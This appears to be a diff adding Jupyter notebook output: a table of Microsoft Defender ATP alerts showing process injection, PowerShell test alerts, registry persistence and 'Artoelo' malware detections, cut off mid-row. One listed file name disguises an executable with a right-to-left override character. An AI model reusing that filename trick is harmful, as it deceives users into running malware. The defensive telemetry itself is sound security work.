+       "      <th>AlertId</th>\n",
+       "      <th>EventTime</th>\n",
+       "      <th>MachineId</th>\n",
+       "      <th>ComputerName</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Category</th>\n",
+       "      <th>Title</th>\n",
+       "      <th>FileName</th>\n",
+       "      <th>SHA1</th>\n",
+       "      <th>RemoteUrl</th>\n",
+       "      <th>RemoteIP</th>\n",
+       "      <th>ReportId</th>\n",
+       "      <th>Table</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <td>0</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-08T17:22:37.8742974Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>b6d237154f2e528f0b503b58b025862d66b02b73</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>454</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>1</td>\n",
+       "      <td>da637111470533220658_-1814166510</td>\n",
+       "      <td>2019-12-05T12:34:34.7864124Z</td>\n",
+       "      <td>1e9f8f18585e70ef1f167fbf5e8bf7c3dccc5739</td>\n",
+       "      <td>olaa-win10pro-1607</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>044a0cf1f6bc478a7172bf207eef1e201a18ba02</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>4369</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>2</td>\n",
+       "      <td>da637111470533220658_-1814166510</td>\n",
+       "      <td>2019-12-05T12:34:34.7864124Z</td>\n",
+       "      <td>1e9f8f18585e70ef1f167fbf5e8bf7c3dccc5739</td>\n",
+       "      <td>olaa-win10pro-1607</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>99ae9c73e9bee6f9c76d6f4093a9882df06832cf</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>4369</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>3</td>\n",
+       "      <td>da637111448595540767_-885088719</td>\n",
+       "      <td>2019-12-05T12:11:25.5486226Z</td>\n",
+       "      <td>499bdd5330f78dc82d0051c8d7a9eb9d69f88333</td>\n",
+       "      <td>nestorw-win10pro-1803</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>1b3b40fbc889fd4c645cc12c85d0805ac36ba254</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>14968</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>4</td>\n",
+       "      <td>da637111448595540767_-885088719</td>\n",
+       "      <td>2019-12-05T12:11:25.5486226Z</td>\n",
+       "      <td>499bdd5330f78dc82d0051c8d7a9eb9d69f88333</td>\n",
+       "      <td>nestorw-win10pro-1803</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>3ce71813199abae99348f61f0caa34e2574f831c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>14968</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>5</td>\n",
+       "      <td>da637111835325717564_-1865655676</td>\n",
+       "      <td>2019-12-05T16:05:46.4778106Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>36c5d12033b2eaf251bae61c00690ffb17fddc87</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>2376</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>6</td>\n",
+       "      <td>da637111835325717564_-1865655676</td>\n",
+       "      <td>2019-12-05T16:05:46.4778106Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>d487580502354c61808c7180d1a336beb7ad4624</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>2376</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>7</td>\n",
+       "      <td>da637111691253610692_623907060</td>\n",
+       "      <td>2019-12-05T16:50:16.9477916Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>36c5d12033b2eaf251bae61c00690ffb17fddc87</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>915</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>8</td>\n",
+       "      <td>da637111691253610692_623907060</td>\n",
+       "      <td>2019-12-05T16:50:16.9477916Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8dca9749cd48d286950e7a9fa1088c937cbccad4</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>915</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>9</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T16:56:18.6397738Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1190</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>10</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T16:56:18.6397738Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1190</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>11</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T16:56:18.6397738Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1190</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>12</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T16:56:18.6397738Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1190</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>13</td>\n",
+       "      <td>da637111691251815824_2024877765</td>\n",
+       "      <td>2019-12-05T16:56:18.6407635Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Persistence</td>\n",
+       "      <td>Anomaly detected in ASEP registry</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1187</td>\n",
+       "      <td>RegistryEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>14</td>\n",
+       "      <td>da637111691256543941_-1462732472</td>\n",
+       "      <td>2019-12-05T16:56:18.6407635Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Persistence</td>\n",
+       "      <td>An uncommon file was created and added to a Ru...</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1187</td>\n",
+       "      <td>RegistryEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>15</td>\n",
+       "      <td>da637111691246094719_-1324223004</td>\n",
+       "      <td>2019-12-05T16:56:18.6685765Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>EAF violation blocked by exploit protection</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1191</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>16</td>\n",
+       "      <td>da637111618734194967_-707278866</td>\n",
+       "      <td>2019-12-05T16:56:18.8702258Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>Malware</td>\n",
+       "      <td>An active 'Artoelo' malware was detected</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1200</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>17</td>\n",
+       "      <td>da637111691251004475_-451474344</td>\n",
+       "      <td>2019-12-05T16:56:19.0725178Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Malware</td>\n",
+       "      <td>'Artoelo' malware was detected</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1194</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>18</td>\n",
+       "      <td>da637111691511319089_701653122</td>\n",
+       "      <td>2019-12-05T17:01:20.0899859Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>SuspiciousActivity</td>\n",
+       "      <td>A suspicious file was observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>36c5d12033b2eaf251bae61c00690ffb17fddc87</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1449</td>\n",
+       "      <td>FileCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>19</td>\n",
+       "      <td>da637111691521375847_1538423732</td>\n",
+       "      <td>2019-12-05T17:01:20.0899859Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>Suspicious behavior by cmd.exe was observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>36c5d12033b2eaf251bae61c00690ffb17fddc87</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1449</td>\n",
+       "      <td>FileCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>20</td>\n",
+       "      <td>da637111691521375847_1538423732</td>\n",
+       "      <td>2019-12-05T17:12:41.4195893Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>Suspicious behavior by cmd.exe was observed</td>\n",
+       "      <td>WindowsDefenderAtpProvisioningService.exe</td>\n",
+       "      <td>2f5a566429f0df02dd0dfb45be075531f332a887</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1960</td>\n",
+       "      <td>FileCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>21</td>\n",
+       "      <td>da637111691511319089_701653122</td>\n",
+       "      <td>2019-12-05T17:12:41.4195893Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>SuspiciousActivity</td>\n",
+       "      <td>A suspicious file was observed</td>\n",
+       "      <td>WindowsDefenderAtpProvisioningService.exe</td>\n",
+       "      <td>2f5a566429f0df02dd0dfb45be075531f332a887</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1960</td>\n",
+       "      <td>FileCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>22</td>\n",
+       "      <td>da637111691521375847_1538423732</td>\n",
+       "      <td>2019-12-05T17:12:41.4195893Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>Suspicious behavior by cmd.exe was observed</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1960</td>\n",
+       "      <td>FileCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>23</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T17:12:43.2754844Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1972</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>24</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T17:12:43.2754844Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1972</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>25</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T17:12:43.2754844Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1972</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>26</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T17:12:43.2754844Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1972</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>27</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T17:12:43.2754844Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1972</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>28</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T17:12:43.2754844Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1972</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>29</td>\n",
+       "      <td>da637111691251815824_2024877765</td>\n",
+       "      <td>2019-12-05T17:12:43.2822557Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Persistence</td>\n",
+       "      <td>Anomaly detected in ASEP registry</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1970</td>\n",
+       "      <td>RegistryEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>30</td>\n",
+       "      <td>da637111691256543941_-1462732472</td>\n",
+       "      <td>2019-12-05T17:12:43.2822557Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Persistence</td>\n",
+       "      <td>An uncommon file was created and added to a Ru...</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1970</td>\n",
+       "      <td>RegistryEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>31</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-05T14:38:34.3208724Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>45</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>32</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-05T14:38:34.3208724Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8c5437cd76a89ec983e3b364e219944da3dab464</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>45</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>33</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-05T15:06:20.3372768Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>256</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>34</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-05T15:06:20.3372768Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>b6d237154f2e528f0b503b58b025862d66b02b73</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>256</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>35</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-05T15:22:44.3072402Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>368</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>36</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-05T15:22:44.3072402Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>b6d237154f2e528f0b503b58b025862d66b02b73</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>368</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>37</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-05T16:02:02.3857966Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>162</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>38</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-05T16:02:02.3857966Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>b6d237154f2e528f0b503b58b025862d66b02b73</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>162</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>39</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-08T15:59:28.1181531Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8c5437cd76a89ec983e3b364e219944da3dab464</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>130</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>40</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-08T15:59:28.1181531Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>130</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>41</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-08T17:11:14.931633Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
